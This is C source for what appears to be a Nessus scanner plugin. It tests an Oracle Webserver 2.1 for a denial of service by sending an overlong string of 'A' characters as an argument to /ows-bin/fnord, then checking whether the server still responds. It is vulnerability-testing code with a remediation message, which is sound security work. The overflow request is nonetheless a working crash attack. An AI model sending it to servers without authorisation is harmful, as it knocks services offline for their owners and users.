#include <config.h>
#include <nessuslib.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef HAVE_STRING_H
#include <string.h>
#endif /* HAVE_STRING_H */

#ifndef NESSUS_NT
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>  
#else
#include <windows.h>
#endif

#define NAME "Oracle Webserver denial of service"
#define DESC "\
Version 2.1 of Oracle Webserver can be lead to a\n\
denial of service if it is sent a too long string\n\
argument\n\
Risk factor : Medium"
#define COPYRIGHT "no copyright"
#define SUMM "overflows the buffer of the remote ows"


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	return(0);
}

int is_ows_installed(data, cgi_name)
 struct arglist * data;
 char * cgi_name;
{
  char * command = emalloc(200);
  short soc=-1;
  short i=0;
  char * buff = emalloc(256);

  sprintf(command, "GET /ows-bin/%s HTTP/1.0\nhostname: %s\n\n",
          cgi_name,  plug_get_hostname(data));

  soc = open_sock_tcp(data, 80);
  if(soc <0)return(0); /* couldn't open a connection */
  send(soc, command, strlen(command), 0);
  recv(soc, buff, 255,0);
  efree(&command);
  closesocket(soc);

  if(strstr(buff, "HTTP/1.0 200 ") || strstr(buff, "HTTP/1.1 200 "))i=1; /* No e
rror */
  else i=0; /* Error */     
  
  efree(&buff);
  return(i);
}  

PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	
	if(host_get_port_state(args, 80)<=0)return(0);
	if(is_ows_installed(args, "fnord"))
	{
	char * buffer;
	char * crap;
	crap = emalloc(1024);
	memset(crap, 'A', 1023);
	buffer = emalloc(2048);
	
	 sprintf(buffer, "fnord?foo=%s\n",
	  	crap);
	efree(&crap);
	
	if(!is_ows_installed(args, buffer))
	{
	 post_hole(args, 80,
"The remote oracle web server could be lead to a denial\n\
of service by sending a too long argument to /ows-bin/fnord\n\
Solution : upgrade or downgrade to version 2.0");
	}
	efree(&buffer);
	}
	return(0);
}

